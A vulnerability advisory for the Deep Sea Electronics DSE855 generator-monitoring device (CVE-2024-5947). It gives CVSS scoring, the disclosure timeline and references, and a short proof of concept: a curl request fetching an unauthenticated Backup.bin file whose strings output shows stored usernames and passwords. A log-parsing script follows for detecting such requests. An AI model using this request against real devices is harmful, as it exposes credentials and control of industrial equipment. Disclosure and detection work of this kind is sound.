CVSS3
Attack Vector: ADJACENT
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score Confidence: High
EPSS Percentile: 29.8%
Title: Deep Sea Electronics DSE855 Remote Authentication Bypass
Advisory ID: ZSL-2024-5825
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (5/5)
Release Date: 03.07.2024
Summary: The DSE855 communications device allows monitoring of a single DSE controller with USB connectivity over a LAN or WAN connection. To achieve this the DSE855 utilises its in-built web server or MODBUS TCP. In order to use over a LAN connection the on-site router must be configured to be accessible from any global location.
Desc: The device is vulnerable to configuration disclosure when a direct object reference is made to the Backup.bin file using an HTTP GET request. This allows an attacker to obtain sensitive information that aids authentication bypass, privilege escalation and full system access.
Vendor: Deep Sea Electronics plc - <https://www.deepseaelectronics.com>
Affected version: Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0
Tested on: embOS/IP
[10.11.2023] Vulnerability discovered.
[14.11.2023] Vendor communicated via Trend Micro’s Zero Day Initiative program.
[13.06.2024] ZDI-24-671 advisory released.
[03.07.2024] Public security advisory released.
[18.09.2024] Vendor releases updated firmware to address this issue.
Vulnerability discovered by Gjoko Krstic
[1] <https://www.zerodayinitiative.com/advisories/ZDI-24-671/>
[2] <https://vulners.com/cve/CVE-2024-5947>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2024-5947>
[4] <https://packetstormsecurity.com/files/179342/>
[5] <https://pentest-tools.com/vulnerabilities-exploits/deep-sea-electronics-dse855-authentication-bypass_22935>
[6] <https://www.zerodayinitiative.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855>
[7] <https://www.deepseaelectronics.com/genset/remote-communications-overview-displays/dse855/software>
[03.07.2024] - Initial release
[26.07.2024] - Added reference [4], [5] and [6]
[18.09.2024] - Added vendor status and reference [7]
Zero Science Lab
Web: <https://www.zeroscience.mk>
Deep Sea Electronics DSE855 Remote Authentication Bypass
Vendor: Deep Sea Electronics plc
Product web page: https://www.deepseaelectronics.com
Affected version: Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0
Summary: The DSE855 communications device allows monitoring of a single
DSE controller with USB connectivity over a LAN or WAN connection. To achieve
this the DSE855 utilises its in-built web server or MODBUS TCP. In order
to use over a LAN connection the on-site router must be configured to be
accessible from any global location.
Desc: The device is vulnerable to configuration disclosure when a direct object
reference is made to the Backup.bin file using an HTTP GET request. This allows
an attacker to obtain sensitive information that aids authentication bypass,
privilege escalation and full system access.
Tested on: embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5825
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php
ZDI ID: ZDI-24-671
ZDI CAN: ZDI-CAN-22679
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability
CVE ID: CVE-2024-5947
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947
10.11.2023
--
$ curl -s -O http://target/Backup.bin
$ strings Backup.bin
DSEB
Admin
Password1234
Tech
Password1234
thricer
scada
rd1234
lokna
xela123
DSE855
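One way to look for the request from the proof of concept above in HTTP access logs, as an added example that is not part of the advisory or the vendor's software. It assumes a reverse proxy or web gateway in front of the DSE855 that writes Combined Log Format lines; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a reverse proxy in front of the device writes Combined Log Format;
# the advisory does not describe any logging on the DSE855 itself.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
BACKUP_NAME = "backup.bin"  # file named in the advisory, matched case-insensitively


def is_backup_request(target):
    """True when the last path segment is Backup.bin after percent-decoding."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    segment = unquote(path).rstrip("/").rsplit("/", 1)[-1]
    return segment.lower() == BACKUP_NAME


def find_backup_requests(lines):
    """Return one finding per request for Backup.bin; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_backup_request(m["target"]):
            continue
        # "served": a GET answered with a non-empty 2xx body; anything else is a probe.
        served = (m["method"] == "GET" and m["status"].startswith("2")
                  and m["size"] not in ("-", "0"))
        findings.append({"src": m["src"], "time": m["ts"], "target": m["target"],
                         "status": int(m["status"]),
                         "result": "served" if served else "probe"})
    return findings


# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [03/Jul/2024:10:15:02 +0000] "GET /Backup.bin HTTP/1.1" 200 4096 "-" "curl/8.5.0"',
    '198.51.100.23 - - [03/Jul/2024:10:15:09 +0000] "GET /%42ackup.bin?x=1 HTTP/1.1" 404 0 "-" "curl/8.5.0"',
    '192.0.2.44 - - [03/Jul/2024:10:16:40 +0000] "GET /index.html HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Sep/2024:08:01:11 +0000] "GET /backup.BIN HTTP/1.1" 401 0 "-" "python-requests/2.31"',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for f in find_backup_requests(SAMPLE_LOG):
        print(f"{f['result']:6} {f['src']:15} {f['time']}  {f['target']} -> {f['status']}")
```

A `served` result means the configuration backup left the device, so the accounts stored in it should be treated as exposed and their passwords changed. The vendor released updated firmware for this issue on 18.09.2024.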